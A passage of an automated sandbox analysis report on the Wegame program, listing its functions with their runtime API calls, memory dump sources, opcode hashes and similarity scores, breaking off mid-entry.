                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 1641273540-0
                                                                • Opcode ID: 6d137d8cb746266985ccae35af4ba12f675cc348a4d1f101a086198a4e956c8e
                                                                • Instruction ID: b9e551cdf39ee8b227fd7d8afbbf922339b4fd9d2b75553ecdf7215ee69541dc
                                                                • Opcode Fuzzy Hash: 6d137d8cb746266985ccae35af4ba12f675cc348a4d1f101a086198a4e956c8e
                                                                • Instruction Fuzzy Hash: A3F0A031911248ABCF01EBB8C5027CC3B609F11368F505158F6005F290CB3D8B41A7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD99E5D Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD99E64
                                                                  • Part of subcall function 6BD9A0A9: __EH_prolog3.LIBCMT ref: 6BD9A0B0
                                                                  • Part of subcall function 6BD2F6D8: __EH_prolog3_GS.LIBCMT ref: 6BD2F6DF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$H_prolog3_
                                                                • String ID:
                                                                • API String ID: 4240126716-0
                                                                • Opcode ID: 9e189a0619e13958f2d730826f6a9938671e4a35d4cdb9f3ebf02a7f60f0335c
                                                                • Instruction ID: ef485ae1b1f26bc083d1fbdd06159cb5f84126d528a1edd0058ccbde40120b41
                                                                • Opcode Fuzzy Hash: 9e189a0619e13958f2d730826f6a9938671e4a35d4cdb9f3ebf02a7f60f0335c
                                                                • Instruction Fuzzy Hash: A1E09272A116159FDB11EF78D442A9EBBB0FF14724F20426AE114DB390CB788F418BD5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3B8B9 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BD3B8D3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: fflush
                                                                • String ID:
                                                                • API String ID: 497872470-0
                                                                • Opcode ID: e112d52753034fd49b3c2fc8120fb5d16bb36a3f83adef313cf00b9fd35b7c1e
                                                                • Instruction ID: 73ea5a5291f8885c982cafa7a51cdb4be4f1203cb538bb34105caba3b67e5a29
                                                                • Opcode Fuzzy Hash: e112d52753034fd49b3c2fc8120fb5d16bb36a3f83adef313cf00b9fd35b7c1e
                                                                • Instruction Fuzzy Hash: 3DE0C235311824CBE7251B1AEC09A5673EAAFC7232725076FE160C60E0C764C802AB10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD38E45 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD38E4C
                                                                  • Part of subcall function 6BD345D7: __EH_prolog3.LIBCMT ref: 6BD345DE
                                                                  • Part of subcall function 6BD3A667: __EH_prolog3_GS.LIBCMT ref: 6BD3A66E
                                                                  • Part of subcall function 6BD3A667: ?rdstate@ios_base@std@@QBEHXZ.MSVCP140(?,00000032,00000040,00000024,6BD38E76,?,?,?,00000004,6BD36B89,00000000,?,00000000), ref: 6BD3A69C
                                                                  • Part of subcall function 6BD3A667: OutputDebugStringW.KERNEL32(00000000,?,?,?,00000000), ref: 6BD3A6CC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?rdstate@ios_base@std@@DebugH_prolog3_OutputString
                                                                • String ID:
                                                                • API String ID: 2460924097-0
                                                                • Opcode ID: e1d2d10e1705cd01aadeaf850c4e65481c3dd17e3bb38cb8092dabc0d75ed609
                                                                • Instruction ID: 88ca8b43866a955ec58a73ef100eab389c29effb6c995ec74dff3bb4d3b51a1f
                                                                • Opcode Fuzzy Hash: e1d2d10e1705cd01aadeaf850c4e65481c3dd17e3bb38cb8092dabc0d75ed609
                                                                • Instruction Fuzzy Hash: 61E04FB1D00128EBDF119F698801A8DFBB5BFA1314F10405AE954AB221C7BB4B51EB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9182F Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD91836
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                  • Part of subcall function 6BD916BC: __EH_prolog3.LIBCMT ref: 6BD916C3
                                                                  • Part of subcall function 6BD916BC: _Mtx_init_in_situ.MSVCP140(?,00000002,00000008,6BD9185D,00000004,6BD952B7,00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD91791
                                                                  • Part of subcall function 6BD916BC: memset.VCRUNTIME140(?,00000000,00004EAC,?,00000002,00000008,6BD9185D,00000004,6BD952B7,00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002), ref: 6BD917A8
                                                                  • Part of subcall function 6BD916BC: GetCurrentThreadId.KERNEL32 ref: 6BD91817
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CurrentMtx_init_in_situThreadmallocmemset
                                                                • String ID:
                                                                • API String ID: 3113669236-0
                                                                • Opcode ID: 0e9df92a818e71fe7cfa4ed4f342a2f3877ed49398284cf9fdabe6a9480aa9c5
                                                                • Instruction ID: cb128e36bfe12602de141758ecb19742f9997443852919c26a24c6b3734d8450
                                                                • Opcode Fuzzy Hash: 0e9df92a818e71fe7cfa4ed4f342a2f3877ed49398284cf9fdabe6a9480aa9c5
                                                                • Instruction Fuzzy Hash: 69E04670B10712ABDB14AFFC084215A76A2AB14624B2046BE92758F2E1DBB88E04A764
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043EF54 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0043EF5B
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                  • Part of subcall function 0043DDA0: __EH_prolog3_GS.LIBCMT ref: 0043DDA7
                                                                  • Part of subcall function 0043DDA0: ??0CThread@@QAE@XZ.COMMON(00000024), ref: 0043DDB4
                                                                  • Part of subcall function 0043DDA0: ?appdata_project_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0043DDDE
                                                                  • Part of subcall function 0043DDA0: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0043DDFA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?appdata_project_folder@File_info@common@ierd_tgp@@H_prolog3H_prolog3_SimpleString::operator=Thread@@Vpath@filesystem@3@malloc
                                                                • String ID:
                                                                • API String ID: 658492096-0
                                                                • Opcode ID: 266035cc553bedc853428317614beb550709620193ba52f9d9cbd74bcb1c1547
                                                                • Instruction ID: 79719367fea8a03f753482770b8d21a7f1d5cffbeb5b0c5f44a608665f07df3c
                                                                • Opcode Fuzzy Hash: 266035cc553bedc853428317614beb550709620193ba52f9d9cbd74bcb1c1547
                                                                • Instruction Fuzzy Hash: A7E04F74B053029ECB14EFBA680121E36E06F44314F90822EB110D73D1FF788600860E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004519D5 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: 9b5b1cfe6d30bc59acfd23507000cdca69a7c93466fd262c4ea4506234660028
                                                                • Instruction ID: 20fbfac0972529a09ad8d9adb7bc7e614590981306ea983fffb18179b55d53dd
                                                                • Opcode Fuzzy Hash: 9b5b1cfe6d30bc59acfd23507000cdca69a7c93466fd262c4ea4506234660028
                                                                • Instruction Fuzzy Hash: 70E0C935910209DBDF05AF69C5063AD3761BB4432AF644549E8106F292CB789A168B9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3C3AB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3C3B2
                                                                  • Part of subcall function 6BD19850: __EH_prolog3.LIBCMT ref: 6BD19857
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID:
                                                                • API String ID: 431132790-0
                                                                • Opcode ID: ffbf63ea5f3164ee4a544b7c1dda35ea005e65c2059cf38481dafa733813681f
                                                                • Instruction ID: 590d4df89bf96229aad6b7e88d71f679d366aac1d1e9afeb30df8578bceb1ce2
                                                                • Opcode Fuzzy Hash: ffbf63ea5f3164ee4a544b7c1dda35ea005e65c2059cf38481dafa733813681f
                                                                • Instruction Fuzzy Hash: F4E01271910209ABDF15DFB4D8069EEB775AF10334F10832EA5329A1E1DB788B16D760
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD31608 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3160F
                                                                  • Part of subcall function 6BD254B1: __EH_prolog3.LIBCMT ref: 6BD254B8
                                                                  • Part of subcall function 6BD31D7B: __EH_prolog3_GS.LIBCMT ref: 6BD31D82
                                                                  • Part of subcall function 6BD31D7B: GetTickCount.KERNEL32 ref: 6BD31DB8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 1641273540-0
                                                                • Opcode ID: 79e0ecb6fb1e6427b424f092bd5324f04a365e56e2615c9f8cb837384092345c
                                                                • Instruction ID: 047978196ed66a43dce45ecdfd41ca8dc30e05724c4f58f4987cf2edab6b6d0b
                                                                • Opcode Fuzzy Hash: 79e0ecb6fb1e6427b424f092bd5324f04a365e56e2615c9f8cb837384092345c
                                                                • Instruction Fuzzy Hash: A8E06D30821248ABCF01EBB8C8067DC7B646F11328F90425CE5005E2D0CB7D8B55A7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF700D0 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WS2_32(?,1F5A0D44), ref: 6BF70103
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: 30ac7b22560502581b56261bdcde7254aaf3fd327ac7ca5fff720b6e280be522
                                                                • Instruction ID: 67a6cf5c40ff4225f34aed4318e856ee867df3788e7b6697bc539753e38ce203
                                                                • Opcode Fuzzy Hash: 30ac7b22560502581b56261bdcde7254aaf3fd327ac7ca5fff720b6e280be522
                                                                • Instruction Fuzzy Hash: 25E086705142804FCB35BB28C476BFA7BE4AB8E300F400819A1DDC7240E63C95058752
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD61BAD Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BD16B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C098414,6BD16BB1,6C098418,?,6BD1A235,00000000,?,00000010), ref: 6BD16B81
                                                                  • Part of subcall function 6BD16B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BD16B8D
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,00000000,?,?,?,?,6C03BD18,?,?,?,?,?,00000000,00000044,?,6C03BD18), ref: 6BD61BC5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?exists@filesystem@ierd_tgp@@Execute_once@std@@Uonce_flag@1@Verror_code@std@@@Vpath@12@terminate
                                                                • String ID:
                                                                • API String ID: 3201841121-0
                                                                • Opcode ID: 44bad85fd55e388663efb16c1270524ad2c5c494d0e774fee32e5b264cdd4f1a
                                                                • Instruction ID: ca7810481f279a3fc0b64f3eacf4750d974c821dfe695c5f98abae31212960ec
                                                                • Opcode Fuzzy Hash: 44bad85fd55e388663efb16c1270524ad2c5c494d0e774fee32e5b264cdd4f1a
                                                                • Instruction Fuzzy Hash: 67D012B241820CBFEB059BE1D903EDE7FFCDB003A9F10415AE4059A090FB79AB4486B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD46FC9 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                  • Part of subcall function 6BD46FE3: __EH_prolog3.LIBCMT ref: 6BD46FEA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?get_cfg@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3U?$less@V12@V?$basic_ptree@Vpath@filesystem@2@
                                                                • String ID:
                                                                • API String ID: 1018117080-0
                                                                • Opcode ID: 4f23327678cb210834d688bdc7d14eaf2cd09f839c3f7af599adfa6ff0f24a10
                                                                • Instruction ID: 86d5dc060af8511b225af91d828deaed6b8f731003e018e8950c9645eaa0920a
                                                                • Opcode Fuzzy Hash: 4f23327678cb210834d688bdc7d14eaf2cd09f839c3f7af599adfa6ff0f24a10
                                                                • Instruction Fuzzy Hash: 4FC04C7254030C77DF111E95DC02F993F2AAB04764F444051FA1D1D1A1D6B3D6709A95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD8DDA8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6BDB2AD3), ref: 6BD8DDAC
                                                                  • Part of subcall function 6BDCD02A: __EH_prolog3_GS.LIBCMT ref: 6BDCD034
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_client_id@util_client_info@ierd_tgp@@H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2109118023-0
                                                                • Opcode ID: c17886725840c015b45c5a4d1e79ee43962f58d5b6a86223b302f8f4e3c97628
                                                                • Instruction ID: e0a5ce8581136b779f481ca576559925a00caa87804778895f6bb9e2e0e4cf25
                                                                • Opcode Fuzzy Hash: c17886725840c015b45c5a4d1e79ee43962f58d5b6a86223b302f8f4e3c97628
